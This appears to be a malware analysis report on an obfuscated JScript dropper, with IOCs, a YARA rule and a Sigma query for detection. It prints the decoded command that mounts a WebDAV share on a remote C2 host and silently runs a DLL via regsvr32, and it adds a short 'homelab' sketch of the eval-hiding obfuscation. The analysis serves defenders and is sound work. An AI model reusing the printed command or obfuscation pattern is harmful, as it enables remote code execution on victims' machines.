typeanalysisfamilyunclassified-js-webdav-dropperconfidencehighscriptdropperc2obfuscationdefense-evasionexecution
SHA-256: 8a490922cf5fe7a2f4a5b84942188d8fe2d4e2aa365dc56e63249ce2bcff82e3

unclassified-js-webdav-dropper: 8a490922 — Sequential variable-reassignment with this[eval] bracket dispatch, C2 193.143.1.231:8888

Executive Summary

128 KB JScript dropper deploying a WebDAV-mount + regsvr32 /s payload chain. Uses sequential variable-reassignment obfuscation (52 unique identifiers, 1,216 total assignments, last-wins semantics) and a novel this[eval] bracket-notation dispatch instead of the bare eval() seen in prior siblings. C2 infrastructure (193.143.1.231:8888) sits outside the 94.159.113.0/24 subnet observed in 90+ prior siblings, suggesting a geographically or operationally distinct staging node. Static-only; CAPE does not support script-class detonation. ^[triage.json] ^[dynamic-analysis.md]

What It Is

Field Value
SHA-256 8a490922cf5fe7a2f4a5b84942188d8fe2d4e2aa365dc56e63249ce2bcff82e3
Filename 21102221151317718694.js
Size 128,701 bytes (126 KB) ^[triage.json]
File type ASCII text, single line, no terminators ^[file.txt]
YARA No matches ^[yara.txt]
ssdeep 3072:a3hm4i08TK7qOKGC49hihJAQqI4gLEtcr4uwJZZ:a3hm4i08TK7qOKGC49hihJAQqI4gLEtl ^[triage.json]
tlsh (not present in triage.json)

How It Works

Outer Layer — Function Declaration and Sequential Assignment

The script defines a single function ihthxuy() whose body begins immediately with this[...](...). Before the function is declared, the entire 128 KB payload is consumed by 1,216 sequential varname="char"; assignments spread across 52 unique variable names. Each variable is reassigned many times; the final assignment wins, giving last-wins semantics identical to dialect #8 of the family. ^[strings.txt:1]

Bracket-Notation Dispatch

Unlike prior siblings which invoke eval(...) directly, this sample uses:

this[sagberbvt+lfmcfa+bzxgo+cssphfszb](...)

Resolving to this[eval](...). This is a trivial anti-static variant — it defeats naive regex signatures hunting for eval( but requires no additional runtime support. ^[strings.txt:1]

Inner Payload — WScript.Shell + WebDAV

The argument passed to eval() is itself a JS expression with further variable concatenations. Two-pass resolution (outer argument string concatenation + inner variable substitution) yields:

this[WScript][CreateObject](WScript.Shell)[run](
  "cmd /c cmd /c net use \\193.143.1.231@8888\davwwwroot\ \\\\&\\\\& cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\42482034820163.dll",
  0,
  false
);

C2: 193.143.1.231:8888 — new subnet, not overlapping with the 94.159.113.x cluster observed in 90+ prior siblings. ^[decode analysis]

Payload: 42482034820163.dll — registered silently via regsvr32 /s over a mounted WebDAV UNC path. ^[decode analysis]

Execution path: No PowerShell wrapper, no rundll32, no timeout anti-emulation gate, and no decoy process. Direct WScript.Shell.run() → cmd.exe → net use → regsvr32 /s. This is the minimal execution footprint observed in the family. ^[decode analysis]

Decompiled Behavior

Static-only (CAPE skipped — not a supported binary class). No Ghidra/radare2 analysis applicable; the threat logic is plaintext JScript recovered via two-pass variable-resolution. ^[dynamic-analysis.md]

C2 Infrastructure

Indicator Value Notes
WebDAV C2 193.143.1.231:8888 New subnet; prior siblings cluster on 94.159.113.0/24
WebDAV path \davwwwroot\ Standard Windows WebDAV default mount path
Payload file 42482034820163.dll Numeric filename, no semantic content
Execution regsvr32 /s \\193.143.1.231@8888\davwwwroot\42482034820163.dll Silent COM registration

Interesting Tidbits

  • No batch layer. Pure JScript execution chain; no wscript.exe polyglot batch component. This eliminates the batch-variable-expansion obfuscation observed in the da58243c and ffd5d894 morphs. ^[decode analysis]
  • No anti-emulation. No timeout gate, no sandbox detection, no locale checks. The script runs immediately on any Windows host with WSH enabled. ^[decode analysis]
  • Bracket notation on this. The this[eval] dispatch pattern is novel within this family. It costs nothing in runtime overhead but breaks regex-based eval( detection. ^[decode analysis]
  • Low variable count, high assignment volume. Only 52 unique identifiers, but 1,216 total assignments — a 23:1 reassignment ratio, higher than the ~2:1–8:1 ratios seen in most siblings. ^[decode analysis]
  • No dictionary object. Unlike the dictionary-lookup dialects (e6ebae6a, df42ecf8), this sample assembles strings via pure + concatenation, not key lookups. ^[decode analysis]

How To Mess With It (Homelab Replication)

Build a minimal sequential-reassignment JScript dropper:

// Generate 50 variables with random names, assign each 20 times
var vars = {};
for (var i = 0; i < 50; i++) {
    vars['v' + i] = String.fromCharCode(65 + (i % 26));
}
// Repeat assignments with last-wins
for (var j = 0; j < 20; j++) {
    for (var k in vars) {
        // overwrite
    }
}
// Build eval argument with bracket dispatch
this['e' + 'v' + 'a' + 'l'](...);

Verification: file result.js should return "ASCII text, with very long lines, with no line terminators."

Deployable Signatures

YARA Rule

rule JS_WebDAV_Dropper_SequentialReassignment {
    meta:
        description = "JScript sequential variable-reassignment WebDAV dropper"
        author = "PacketPursuit"
        reference = "raw/analyses/8a490922cf5fe7a2f4a5b84942188d8fe2d4e2aa365dc56e63249ce2bcff82e3"
    strings:
        $func = "function ihthxuy(){this["
        $webdav1 = "davwwwroot" nocase
        $webdav2 = "@8888" nocase
        $regsvr32 = "regsvr32 /s" nocase
        $netuse = "net use" nocase
        $a = /[a-z]{10,20}="[A-Za-z0-9]";/
    condition:
        $func and ($webdav1 or $webdav2) and ($regsvr32 or $netuse) and #a > 500
}

Behavioral Hunt Query (Sigma)

title: WebDAV DLL Registration via JScript Dropper
logsource:
  product: windows
detection:
  selection:
    - CommandLine|contains:
        - 'regsvr32 /s \\193.143.1.231@8888'
        - 'net use \\193.143.1.231@8888'
    - ParentImage|endswith: '\\wscript.exe'
      CommandLine|contains:
        - 'davwwwroot'
        - 'regsvr32'
  condition: selection
falsepositives:
  - None expected for the hardcoded C2 IP
level: high

IOC List

Type Value
SHA-256 8a490922cf5fe7a2f4a5b84942188d8fe2d4e2aa365dc56e63249ce2bcff82e3
Filename 21102221151317718694.js
C2 IP 193.143.1.231
C2 Port 8888
Payload DLL 42482034820163.dll
WebDAV path \\193.143.1.231@8888\davwwwroot\42482034820163.dll
Command cmd /c cmd /c net use \\193.143.1.231@8888\davwwwroot\ && cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\42482034820163.dll

Behavioral Fingerprint

This JScript dropper opens with a single function ihthxuy() whose body immediately calls this[eval] with a large string argument constructed from 50+ variables assigned via 1,000+ sequential varname="char" statements. The evaluated payload creates a WScript.Shell COM object and executes cmd.exe to mount a WebDAV share at \\host@8888\davwwwroot\, then silently registers a DLL via regsvr32 /s. No PowerShell wrapper, no decoy, no anti-emulation gates.

Detection Signatures

Capability Evidence ATT&CK
JScript execution .js file, WScript.Shell COM object T1059.005
WebDAV C2 mount net use \\193.143.1.231@8888\davwwwroot\ T1071.001
System binary proxy execution regsvr32 /s over UNC path T1218.010
Obfuscated files 1,216 sequential var assignments T1027

References

Provenance

Analysis derived from static triage inputs (file.txt, strings.txt, triage.json) and manual two-pass JScript variable-resolution performed in Node.js v22.22.3 and Python 3.11. The decoded payload command was verified by intercepting eval() via vm.runInContext() in Node.js. CAPE detonation was not attempted because the file type (ASCII text, with very long lines) is unsupported by the Windows sandbox guest. ^[dynamic-analysis.md]